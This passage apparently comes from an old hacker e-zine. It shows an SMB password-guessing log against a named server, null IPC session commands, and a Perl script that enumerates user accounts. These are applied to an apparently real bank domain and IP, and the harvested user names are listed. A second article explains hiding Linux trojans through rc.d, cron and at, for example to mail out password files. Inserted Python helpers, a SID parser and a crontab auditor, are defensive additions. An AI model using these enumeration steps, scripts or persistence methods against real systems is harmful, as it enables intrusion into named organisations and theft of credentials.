[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `USER'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `SERVER'
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `LOCAL'
[*]--- Attempting to connect with Username: `GUEST' Password: `'
[*]--- Attempting to connect with Username: `GUEST' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `GUEST' Password: `GUEST'
[*]--- Attempting to connect with Username: `GUEST' Password: `ROOT'
[*]--- Attempting to connect with Username: `GUEST' Password: `ADMIN'
[*]--- Attempting to connect with Username: `GUEST' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `GUEST' Password: `TEMP'
[*]--- Attempting to connect with Username: `GUEST' Password: `SHARE'
[*]--- Attempting to connect with Username: `GUEST' Password: `WRITE'
[*]--- Attempting to connect with Username: `GUEST' Password: `FULL'
[*]--- Attempting to connect with Username: `GUEST' Password: `BOTH'
[*]--- Attempting to connect with Username: `GUEST' Password: `READ'
[*]--- Attempting to connect with Username: `GUEST' Password: `FILES'
[*]--- Attempting to connect with Username: `GUEST' Password: `DEMO'
[*]--- Attempting to connect with Username: `GUEST' Password: `TEST'
[*]--- Attempting to connect with Username: `GUEST' Password: `ACCESS'
[*]--- Attempting to connect with Username: `GUEST' Password: `USER'
[*]--- Attempting to connect with Username: `GUEST' Password: `BACKUP'
[*]--- Attempting to connect with Username: `GUEST' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `GUEST' Password: `SERVER'
[*]--- Attempting to connect with Username: `GUEST' Password: `LOCAL'
[*]--- Attempting to connect with Username: `BACKUP' Password: `'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `BACKUP' Password: `GUEST'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ROOT'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ADMIN'
[*]--- Attempting to connect with Username: `BACKUP' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `BACKUP' Password: `TEMP'
[*]--- Attempting to connect with Username: `BACKUP' Password: `SHARE'
[*]--- Attempting to connect with Username: `BACKUP' Password: `WRITE'
[*]--- Attempting to connect with Username: `BACKUP' Password: `FULL'
[*]--- Attempting to connect with Username: `BACKUP' Password: `BOTH'
[*]--- Attempting to connect with Username: `BACKUP' Password: `READ'
[*]--- Attempting to connect with Username: `BACKUP' Password: `FILES'
[*]--- Attempting to connect with Username: `BACKUP' Password: `DEMO'
[*]--- Attempting to connect with Username: `BACKUP' Password: `TEST'
[*]--- Attempting to connect with Username: `BACKUP' Password: `ACCESS'
[*]--- Attempting to connect with Username: `BACKUP' Password: `USER'
[*]--- Attempting to connect with Username: `BACKUP' Password: `BACKUP'
[*]--- Attempting to connect with Username: `BACKUP' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `BACKUP' Password: `SERVER'
[*]--- Attempting to connect with Username: `BACKUP' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ROOT' Password: `'
[*]--- Attempting to connect with Username: `ROOT' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ROOT' Password: `GUEST'
[*]--- Attempting to connect with Username: `ROOT' Password: `ROOT'
[*]--- Attempting to connect with Username: `ROOT' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ROOT' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ROOT' Password: `TEMP'
[*]--- Attempting to connect with Username: `ROOT' Password: `SHARE'
[*]--- Attempting to connect with Username: `ROOT' Password: `WRITE'
[*]--- Attempting to connect with Username: `ROOT' Password: `FULL'
[*]--- Attempting to connect with Username: `ROOT' Password: `BOTH'
[*]--- Attempting to connect with Username: `ROOT' Password: `READ'
[*]--- Attempting to connect with Username: `ROOT' Password: `FILES'
[*]--- Attempting to connect with Username: `ROOT' Password: `DEMO'
[*]--- Attempting to connect with Username: `ROOT' Password: `TEST'
[*]--- Attempting to connect with Username: `ROOT' Password: `ACCESS'
[*]--- Attempting to connect with Username: `ROOT' Password: `USER'
[*]--- Attempting to connect with Username: `ROOT' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ROOT' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ROOT' Password: `SERVER'
[*]--- Attempting to connect with Username: `ROOT' Password: `LOCAL'
[*]--- Attempting to connect with Username: `ADMIN' Password: `'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `ADMIN' Password: `GUEST'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ROOT'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ADMIN'
[*]--- Attempting to connect with Username: `ADMIN' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `ADMIN' Password: `TEMP'
[*]--- Attempting to connect with Username: `ADMIN' Password: `SHARE'
[*]--- Attempting to connect with Username: `ADMIN' Password: `WRITE'
[*]--- Attempting to connect with Username: `ADMIN' Password: `FULL'
[*]--- Attempting to connect with Username: `ADMIN' Password: `BOTH'
[*]--- Attempting to connect with Username: `ADMIN' Password: `READ'
[*]--- Attempting to connect with Username: `ADMIN' Password: `FILES'
[*]--- Attempting to connect with Username: `ADMIN' Password: `DEMO'
[*]--- Attempting to connect with Username: `ADMIN' Password: `TEST'
[*]--- Attempting to connect with Username: `ADMIN' Password: `ACCESS'
[*]--- Attempting to connect with Username: `ADMIN' Password: `USER'
[*]--- Attempting to connect with Username: `ADMIN' Password: `BACKUP'
[*]--- Attempting to connect with Username: `ADMIN' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `ADMIN' Password: `SERVER'
[*]--- Attempting to connect with Username: `ADMIN' Password: `LOCAL'
[*]--- Attempting to connect with Username: `USER' Password: `'
[*]--- Attempting to connect with Username: `USER' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `USER' Password: `GUEST'
[*]--- Attempting to connect with Username: `USER' Password: `ROOT'
[*]--- Attempting to connect with Username: `USER' Password: `ADMIN'
[*]--- Attempting to connect with Username: `USER' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `USER' Password: `TEMP'
[*]--- Attempting to connect with Username: `USER' Password: `SHARE'
[*]--- Attempting to connect with Username: `USER' Password: `WRITE'
[*]--- Attempting to connect with Username: `USER' Password: `FULL'
[*]--- Attempting to connect with Username: `USER' Password: `BOTH'
[*]--- Attempting to connect with Username: `USER' Password: `READ'
[*]--- Attempting to connect with Username: `USER' Password: `FILES'
[*]--- Attempting to connect with Username: `USER' Password: `DEMO'
[*]--- Attempting to connect with Username: `USER' Password: `TEST'
[*]--- Attempting to connect with Username: `USER' Password: `ACCESS'
[*]--- Attempting to connect with Username: `USER' Password: `USER'
[*]--- Attempting to connect with Username: `USER' Password: `BACKUP'
[*]--- Attempting to connect with Username: `USER' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `USER' Password: `SERVER'
[*]--- Attempting to connect with Username: `USER' Password: `LOCAL'
[*]--- Attempting to connect with Username: `DEMO' Password: `'
[*]--- Attempting to connect with Username: `DEMO' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `DEMO' Password: `GUEST'
[*]--- Attempting to connect with Username: `DEMO' Password: `ROOT'
[*]--- Attempting to connect with Username: `DEMO' Password: `ADMIN'
[*]--- Attempting to connect with Username: `DEMO' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `DEMO' Password: `TEMP'
[*]--- Attempting to connect with Username: `DEMO' Password: `SHARE'
[*]--- Attempting to connect with Username: `DEMO' Password: `WRITE'
[*]--- Attempting to connect with Username: `DEMO' Password: `FULL'
[*]--- Attempting to connect with Username: `DEMO' Password: `BOTH'
[*]--- Attempting to connect with Username: `DEMO' Password: `READ'
[*]--- Attempting to connect with Username: `DEMO' Password: `FILES'
[*]--- Attempting to connect with Username: `DEMO' Password: `DEMO'
[*]--- Attempting to connect with Username: `DEMO' Password: `TEST'
[*]--- Attempting to connect with Username: `DEMO' Password: `ACCESS'
[*]--- Attempting to connect with Username: `DEMO' Password: `USER'
[*]--- Attempting to connect with Username: `DEMO' Password: `BACKUP'
[*]--- Attempting to connect with Username: `DEMO' Password: `SYSTEM'
[*]--- Attempting to connect with Username: `DEMO' Password: `SERVER'
[*]--- Attempting to connect with Username: `DEMO' Password: `LOCAL'
[*]--- Attempting to connect with Username: `TEST' Password: `'
[*]--- Attempting to connect with Username: `TEST' Password: `ADMINISTRATOR'
[*]--- Attempting to connect with Username: `TEST' Password: `GUEST'
[*]--- Attempting to connect with Username: `TEST' Password: `ROOT'
[*]--- Attempting to connect with Username: `TEST' Password: `ADMIN'
[*]--- Attempting to connect with Username: `TEST' Password: `PASSWORD'
[*]--- Attempting to connect with Username: `TEST' Password: `TEMP'
[*]--- Attempting to connect with Username: `TEST' Password: `SHARE'
[*]--- Attempting to connect with Username: `TEST' Password: `WRITE'
[*]--- Attempting to connect with Username: `TEST' Password: `FULL'
[*]--- Attempting to connect with Username: `TEST' Password: `BOTH'
[*]--- Attempting to connect with Username: `TEST' Password: `READ'
[*]--- Attempting to connect with Username: `TEST' Password: `FILES'
[*]--- Attempting to connect with Username: `TEST' Password: `DEMO'
[*]--- Attempting to connect with Username: `TEST' Password: `TEST'
[*]--- CONNECTED: Username: `TEST' Password: `TEST'

[*]--- Obtained server information:

Server=[NSZGATE] User=[] Workgroup=[NSZ_DOMAIN] Domain=[]

[*]--- Obtained listing of shares:

        Sharename      Type      Comment
        ---------      ----      -------
        Add-ins        Disk:     "Access to EDK objects"
        Address        Disk:     "Access to address objects"
        ADMIN$         Disk:     Remote Admin
        C$             Disk:     Default share
        connect$       Disk:     "Access to gateway connectors"
        D$             Disk:     Default share
        daxy           Disk:
        Exchange       Disk:
        F$             Disk:     Default share
        G$             Disk:     Default share
        IPC$           IPC:      Remote IPC
        mspclnt        Disk:
        Resources      Disk:     "Event logging files"
        TEMP           Disk:
        tracking.log   Disk:     "Exchange message tracking logs"
        wwwroot        Disk:

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\Add-ins
[*]--- WARNING: Able to access share: \\*SMBSERVER\Add-ins
[*]--- Checking write access in: \\*SMBSERVER\Add-ins
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Add-ins

[*]--- Attempting to access share: \\*SMBSERVER\Address
[*]--- WARNING: Able to access share: \\*SMBSERVER\Address
[*]--- Checking write access in: \\*SMBSERVER\Address
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Address

[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\connect$
[*]--- WARNING: Able to access share: \\*SMBSERVER\connect$
[*]--- Checking write access in: \\*SMBSERVER\connect$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\connect$

[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\daxy
[*]--- WARNING: Able to access share: \\*SMBSERVER\daxy
[*]--- Checking write access in: \\*SMBSERVER\daxy
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\daxy
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\daxy

[*]--- Attempting to access share: \\*SMBSERVER\Exchange
[*]--- WARNING: Able to access share: \\*SMBSERVER\Exchange
[*]--- Checking write access in: \\*SMBSERVER\Exchange
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Exchange

[*]--- Attempting to access share: \\*SMBSERVER\F$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\G$
[*]--- Unable to access

[*]--- Attempting to access share: \\*SMBSERVER\mspclnt
[*]--- WARNING: Able to access share: \\*SMBSERVER\mspclnt
[*]--- Checking write access in: \\*SMBSERVER\mspclnt
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\mspclnt

[*]--- Attempting to access share: \\*SMBSERVER\Resources
[*]--- WARNING: Able to access share: \\*SMBSERVER\Resources
[*]--- Checking write access in: \\*SMBSERVER\Resources
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Resources

[*]--- Attempting to access share: \\*SMBSERVER\TEMP
[*]--- WARNING: Able to access share: \\*SMBSERVER\TEMP
[*]--- Checking write access in: \\*SMBSERVER\TEMP
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\TEMP
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\TEMP

[*]--- Attempting to access share: \\*SMBSERVER\tracking.log
[*]--- WARNING: Able to access share: \\*SMBSERVER\tracking.log
[*]--- Checking write access in: \\*SMBSERVER\tracking.log
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\tracking.log

[*]--- Attempting to access share: \\*SMBSERVER\wwwroot
[*]--- WARNING: Able to access share: \\*SMBSERVER\wwwroot
[*]--- Checking write access in: \\*SMBSERVER\wwwroot
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\wwwroot
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\wwwroot

[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access

 If the server has no resource sharing, the result is the following:

 [*]--- Checking host: xxx.xxx.xxx.xxx
 [*]--- Obtaining list of remote NetBIOS names
 [*]--- Was not able to obtain any information from remote server

 The  log above shows shares ending in $. These are special shares that can
 be accessed only with an administrator password. The interesting part is
 that the shares C$, D$, E$ and so on are created on every boot of the
 machine and there is no way to remove them. This means that if the hacker
 has an administrator password and port 139 is not firewalled, there is no
 way to stop him - he will have access to the entire file system.

     6.2) Null IPC session

 The IPC$ share exists on every Windows NT machine and accepts connections
 without a user name or password. This is how the so-called "null IPC
 session" is established.

 c:\work>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""

 This session has an interesting effect. Depending on the configuration of
 the server, the null IPC session can allow access to the system that is
 otherwise not permitted:

 c:\work>net view \\xxx.xxx.xxx.xxx
 System error 5 has occurred.

 Access is denied.

 c:\work>net use \\xxx.xxx.xxx.xxx\ipc$ "" /user:""
 The command completed successfully.

 c:\work>net view \\xxx.xxx.xxx.xxx
 Shared resources at \\xxx.xxx.xxx.xxx

 ...

 The null IPC session also allows the user list to be pulled from the
 server. This is done with the programs SID2USER and USER2SID. Windows NT
 assigns a unique identifier, called a SID (Security ID), to every user and
 every group. Through the null IPC session it is possible to call the
 functions that look up the SID of a user and the user name associated with
 a given SID.

 First, let's get the SID of the "domain users" group:

 c:\work>user2sid \\62.200.195.13 "domain users"

 S-1-5-21-1748446749-1388774989-1237804090-513

 Number of subauthorities is 5
 Domain is BNBANK.ORG
 Length of SID in memory is 28 bytes
 Type of SID is SidTypeGroup

 The SID is 5 21 1748446749 1388774989 1237804090 513
 All SIDs on the server differ only in the last digits (513 in this case).
 By default, the SID of the administrator ends in 500.

 c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 500

 Name is Georgi
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 The default NT install SIDs are:

 Administrator      S-1-5-21-917267712-1342860078-1792151419-500 (=0x1F4)
 Guest              S-1-5-21-917267712-1342860078-1792151419-501 (=0x1F5)

 The standard groups are:

 Domain Admins      S-1-5-21-917267712-1342860078-1792151419-512 (=0x200)
 Domain Users       S-1-5-21-917267712-1342860078-1792151419-513 (=0x201)
 Domain Guests      S-1-5-21-917267712-1342860078-1792151419-514 (=0x202)
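
 The SID structure described above, as an added example that is not part of
 the original article or of the sid2user/user2sid tools: a parser that
 splits a SID into domain part and RID, accepts both notations shown here,
 and reproduces the "28 bytes" and "5 subauthorities" figures from the
 user2sid output. Function names are this example's own.

```python
import struct

# RIDs the article lists for a default NT install (domain SIDs, S-1-5-21-...).
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest",
                   512: "Domain Admins", 513: "Domain Users",
                   514: "Domain Guests"}


def parse_sid(text):
    """Return (revision, authority, [sub-authorities]).

    Accepts the canonical "S-1-5-21-...-513" form and the space-separated
    form passed to sid2user ("5 21 ... 513"), where revision 1 is implied.
    """
    text = text.strip()
    if text.upper().startswith("S-"):
        parts = text[2:].split("-")
        revision, fields = int(parts[0]), parts[1:]
    else:
        revision, fields = 1, text.split()
    numbers = [int(f) for f in fields]          # ValueError on non-numeric input
    if len(numbers) < 2:
        raise ValueError("need an authority and at least one sub-authority")
    authority, subs = numbers[0], numbers[1:]
    if not 0 <= revision <= 255 or not 0 <= authority < 2 ** 48:
        raise ValueError("revision or authority out of range")
    if len(subs) > 15 or any(not 0 <= s < 2 ** 32 for s in subs):
        raise ValueError("at most 15 sub-authorities of 32 bits each")
    return revision, authority, subs


def format_sid(revision, authority, subs):
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def sid_to_bytes(revision, authority, subs):
    """In-memory layout: revision byte, count byte, 48-bit big-endian
    authority, then each sub-authority as a 32-bit little-endian integer."""
    header = struct.pack(">BB", revision, len(subs)) + authority.to_bytes(6, "big")
    return header + struct.pack("<%dI" % len(subs), *subs)


def sid_from_bytes(blob):
    if len(blob) < 8 or len(blob) != 8 + 4 * blob[1]:
        raise ValueError("length does not match the sub-authority count")
    authority = int.from_bytes(blob[2:8], "big")
    subs = list(struct.unpack("<%dI" % blob[1], blob[8:]))
    return blob[0], authority, subs


def describe(text):
    """Summarise a SID: domain prefix, RID (decimal and hex), size, meaning."""
    revision, authority, subs = parse_sid(text)
    rid = subs[-1]
    if rid in WELL_KNOWN_RIDS:
        kind = WELL_KNOWN_RIDS[rid]
    elif rid >= 1000:
        kind = "ordinary account or group"   # the article: these start at 1000
    else:
        kind = "other built-in"
    return {
        "sid": format_sid(revision, authority, subs),
        "domain": format_sid(revision, authority, subs[:-1]),
        "rid": rid,
        "rid_hex": "0x%X" % rid,
        "kind": kind,
        "sub_authorities": len(subs),
        "binary_length": len(sid_to_bytes(revision, authority, subs)),
    }


if __name__ == "__main__":
    for sample in ("S-1-5-21-1748446749-1388774989-1237804090-513",
                   "5 21 1748446749 1388774989 1237804090 500"):
        print(describe(sample))
```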

 Normal user accounts start from 1000 upwards. The user list can be pulled
 with sid2user:

 c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1000
 c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1001
 c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1002
 c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1003
 c:\work>sid2user \\62.200.195.13 5 21 1748446749 1388774989 1237804090 1004
 ...

 This can be automated with the following script:

 -- CUT: userlist.pl --------------------------------------------------------

 # Created by Mnemonix 08/06/98

 $target=$ARGV[0];
 $password='""';
 $user='""';
 $break=0;
 $n=0;

 system ("cls");
 print ("USERLIST\nCreated by Mnemonix\n11th of June 1998\n\n");
 print ("Connecting to IPC\$ share on $target...\n");
 $connect=system ("net use \\\\$target\\ipc\$ $password /user:$user");

 if ($connect==0) {
   print ("Connected...\n\n");
   print ("Getting the SID of the Guest account on $target\n");
   system ("user2sid.exe \\\\$target Guest > u2s.tmp");
   open (FILE , "u2s.tmp");

   seek(FILE,6,0);

   while ($break < 5) {
   $char = getc (FILE);
     if ($char eq "-") {
       $char=" ";
       @auth[$n]=$char;
       $break++;
     }
     else {
       @auth[$n]=$char;
     }
     $n++;
   }

   close(FILE);
   system ("del u2s.tmp");

   print ("This is auth 1: ");
   print @auth;
   print ("\n\n");
   open (HANDLE, ">temp.txt");
   select (HANDLE);
   print  @auth;
   close (HANDLE);
   select (STDOUT);

   open (AUTH, "temp.txt");
   $line=<AUTH>;

   print ("Retrieving userlist...the list of users will be stored\n");
   print ("in a text file called $target.txt\n");
   $count=1000;
   while ($count < 1050) {
     print ("$count\n");
     system("sid2user \\\\$target $line $count >> $target.txt");
     $count++;
   }
   close (AUTH);
   system ("del temp.txt");
   print ("\nCompleted");
 }
 else {
   print ("No IPC\$ share available");
 }

 -- CUT: userlist.pl --------------------------------------------------------

 Here is the user list pulled from BNB:

 Name is BNB_LN1$
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is nasko
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is IUSR_BNB_LN1
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is SATURNUS$
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is Stefcho
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is Ivan
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is Everyone
 Domain is BNBANK.ORG
 Type of SID is SidTypeGroup

 Name is Lucy
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is STEFCHO$
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is ITD Admins
 Domain is BNBANK.ORG
 Type of SID is SidTypeGroup

 Name is ITD.BNB.BG$
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is Stefan
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is Tzvetan
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is BNB-LN1$
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser

 Name is WEBSRV$
 Domain is BNBANK.ORG
 Type of SID is SidTypeUser


 >> EOA <<                                                                  

 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#04ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
  [ a r t i c l e ]                                         [ a u t h o r ] 
  Trojan Horse Hiding w/Linux                                       IronCode    
 -ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
 
     Table Of Contents:
       1. Introduction
       2. Trojans as a standalone program
         2.1. Starting
           2.1.1. Execution via rc.d
           2.1.2. Execution via cron
           2.1.3. Execution via at
           2.1.4. Using an incorrectly set PATH
         2.2. Concealment
           2.2.1. Process names
           2.2.2. When run via cron and at
           2.2.3. When run via rc.d
           2.2.4. With an incorrect PATH
           2.2.5. Trojaning procps
       3. Trojans embedded in other programs
       4. General remarks (and hiding traffic in particular)
         4.1. Hiding IP traffic
         4.2. Sending mail
           4.2.1. Via a direct connection
           4.2.2. Via sendmail
           4.2.3. A trojan in sendmail

     1. Introduction
     ---------------

 Trojan horses have always been a very good and well-tested means of getting
 what others would not give us voluntarily. As the name suggests, these are
 programs designed to covertly perform some operation without the knowledge
 of the user.

 I am not going to explain how trojan horses are written, because that is
 not the topic of this article. But I will try to throw out a few ideas so
 that you have some starting point if you decide to make something like
 this. There are, of course, many variants of trojan horses, so don't be
 angry with me if I miss something :-)

 Trojan horses can be divided into two types - those that are built into a
 seemingly harmless program, and those that are in practice a standalone
 program that hides on the system and is started automatically in some way,
 or something like that.

 The former, when they are built into some specific program, can take
 advantage of that. Nobody, for example, will pay attention to the fact that
 sendmail is sending mail, right? ;-) Besides, modifying the program itself
 sometimes lets the trojan hide even better.

     2. Trojans as a standalone program
     ----------------------------------

 These seem to be easier to create, and they have their own advantages.
 They are best suited to places where you have obtained root and it is no
 problem to install the trojan yourself (and even if it is not root, you can
 find a use for it on a specific user).

     2.1. Starting
     -------------

 Standalone trojan programs can be started in two ways. One is manual start
 (by the owner of the trojan or by the victim), and the other is automatic
 start. The two can also be combined - when the trojan horse is run for the
 first time, it adds itself for automatic start.

 Trojan horses can also be resident or non-resident, i.e. they either sit in
 memory and do something periodically, or do it immediately and terminate.

     2.1.1. Execution via rc.d
     -------------------------

 System initialization on Linux (after the kernel and the init program have
 started) begins with the execution of the scripts in the /etc/rc.d
 directory (well, it depends, in some places it may be init.d... The idea is
 what matters). These scripts are not touched very often, since a system
 that has been configured once rarely needs to be changed. And even if
 someone does decide to read or change these scripts, he may not notice some
 additional line slipped in among the rest (all the more so if it looks
 convincing).

 So the rc.d scripts are a suitable place for loading trojan horses that
 stay resident (or are needed at system start). I personally recommend rc.M
 and rc.inet2 as the best, and perhaps rc.modules.

     2.1.2. Execution via cron
     -------------------------

 Cron is the system for periodically starting processes. It is very suitable
 for trojan horses that do not need to be running all the time but have to
 do something periodically (for example mail the passwd and shadow files, or
 scan the /var/spool/mail directories).

 Cron on Linux (usually Dillon's Cron) consists of two parts - the cron
 daemon (crond), which stays resident and takes care of executing the
 processes when needed, and the crontab program, with which the cron tables
 can be edited.

 Every user of the system has his own cron table, in which he can put
 processes for execution. The processes will be executed at the specified
 times, regardless of whether the user is logged in to the system at that
 moment or not. Sounds great, doesn't it :-)

 A line in the cron tables has the format "MIN HOUR DAY MONTH DAYOFWEEK
 COMMAND". It is also allowed to specify masks, to enumerate values (with a
 comma as separator), and to specify a step (once every so many). For
 example (an excerpt from the crontab man page follows), here is how the
 date command can be started periodically:

 # MIN HOUR DAY MONTH DAYOFWEEK   COMMAND
 # at 6:10 a.m. every day
 10 6 * * * date

 # every two hours at the top of the hour
 0 */2 * * * date

 # every two hours from 11p.m. to 7a.m., and at 8a.m.
 0 23-7/2,8 * * * date

 # at 11:00 a.m. on the 4th and on every mon, tue, wed
 0 11 4 * mon-wed date

 # 4:00 a.m. on january 1st
 0 4 1 jan * date

 # once an hour, all output appended to log file
 0 * * * * date >>/var/log/messages 2>&1

 One of the advantages of this method is that nothing wrong is visible when
 the process list is examined - the process is simply not there. And if it
 is started, say, once an hour or once a day, for half a second - nobody
 will simply see it.

 The drawback is that the user can list his cron tables with crontab -l, and
 then he will see the process, which has no way of hiding. But then a
 suitable program name and a suitable comment can be invented, to mislead
 the opponent in the rare cases when he really decides to look where he has
 no business.

 Another problem is that if the machine is switched off at the time you have
 set for the command to start, it will simply not start. But if you are
 doing this on a computer that should be up all the time (for example the
 server of an Internet provider), there is no reason to worry, even if you
 have set execution once a week.

 Besides, this method can be combined with starting via rc.d - for example,
 in addition to once a week, the trojan does whatever it has to do at system
 start as well. That way, even if it did not manage to run on time, your
 program will run as soon as possible after the system is switched on.
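
 Since crontab -l is where such an entry cannot hide, the review can be
 scripted. The following is an added example, not part of the original
 article: it parses the "MIN HOUR DAY MONTH DAYOFWEEK COMMAND" format,
 expands the minute and hour fields (lists, steps, wrapping ranges such as
 23-7/2), and flags commands outside trusted directories or with a daemon
 name in the wrong place. The trusted directory list and the sample crontab
 are assumptions constructed for the example.

```python
import posixpath

# Assumed policy: directories a cron command may live in, and where specific
# daemon names are expected (atrun in /usr/lib is the location the article
# mentions). Adjust both to the audited system.
TRUSTED_DIRS = ("/bin", "/sbin", "/usr/bin", "/usr/sbin", "/usr/lib")
EXPECTED_DIRS = {"atrun": "/usr/lib"}

# Constructed sample crontab, not taken from a real system.
SAMPLE = """\
# MIN HOUR DAY MONTH DAYOFWEEK COMMAND
*/5 * * * * /usr/lib/atrun
10 6 * * * date
0 23-7/2,8 * * * /home/web/.cache/atrun -q
0 4 1 jan *
"""


def expand_field(field, lo, hi):
    """Expand one numeric crontab field into the sorted list of its values."""
    values = set()
    span = hi - lo + 1
    for part in field.split(","):
        rng, _, step = part.partition("/")
        step = int(step) if step else 1
        if step < 1:
            raise ValueError("step must be positive")
        if rng == "*":
            start, end = lo, hi
        elif "-" in rng:
            start, end = (int(x) for x in rng.split("-", 1))
        else:
            start = end = int(rng)
        if not (lo <= start <= hi and lo <= end <= hi):
            raise ValueError("value out of range in %r" % part)
        length = (end - start) % span + 1      # a range such as 23-7 wraps
        values.update(lo + (start - lo + i) % span
                      for i in range(0, length, step))
    return sorted(values)


def audit_crontab(text, trusted=TRUSTED_DIRS, expected=EXPECTED_DIRS):
    """Return one dict per crontab entry with its findings."""
    report = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        entry = {"line": lineno, "command": None,
                 "runs_per_day": None, "findings": []}
        report.append(entry)
        fields = line.split(None, 5)
        if len(fields) < 6:                    # schedule without a command
            entry["findings"].append("malformed")
            continue
        entry["command"] = fields[5]
        try:
            # Runs on each day that the DAY/MONTH/DAYOFWEEK fields select.
            entry["runs_per_day"] = (len(expand_field(fields[0], 0, 59)) *
                                     len(expand_field(fields[1], 0, 23)))
        except ValueError:
            entry["findings"].append("malformed")
            continue
        program = fields[5].split()[0]
        if "/" not in program:                 # resolved through cron's PATH
            entry["findings"].append("bare-name")
            continue
        program = posixpath.normpath(program)  # collapses /usr/lib/../..
        directory, name = posixpath.split(program)
        if not program.startswith("/") or directory not in trusted:
            entry["findings"].append("untrusted-dir")
        if name in expected and directory != expected[name]:
            entry["findings"].append("name-mismatch")
    return report


if __name__ == "__main__":
    for item in audit_crontab(SAMPLE):
        print(item)
```

 Run it over the output of crontab -l for every account, root included.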

     2.1.3. Execution via at
     -----------------------

 at is a system similar to cron, but it serves for one-time execution of a
 command at a specified later time. It is very suitable for destructive
 trojan horses, log wipers, etc.

 In fact at uses cron. It consists of two parts - atrun, which starts the
 commands scheduled for later execution when their time comes (or when it
 has passed), and the commands at, batch, atq and atrm.

 Atrun lives in the cron table of root. It is started periodically, checks
 whose commands have a time that has passed (or arrived), and starts them.
 Normally it should have the mask "* * * * *" in cron, but for example the
 default on Slack 3.6 is to start it every 5 minutes. This does not matter
 much.

 The at and batch commands serve to schedule commands for execution. Atq
 shows a list of the pending and the executed jobs, and atrm removes jobs
 from the list.

 The drawback of this method is that when atq is run by the root user, it
 does not print only his own jobs, but produces a full list of the jobs of
 all users, including those that have already been started. So keep in mind
 that if you use at, it is very easy to see what you have been doing.

 Well, if that does not bother you, go ahead boldly ;-) (not that I
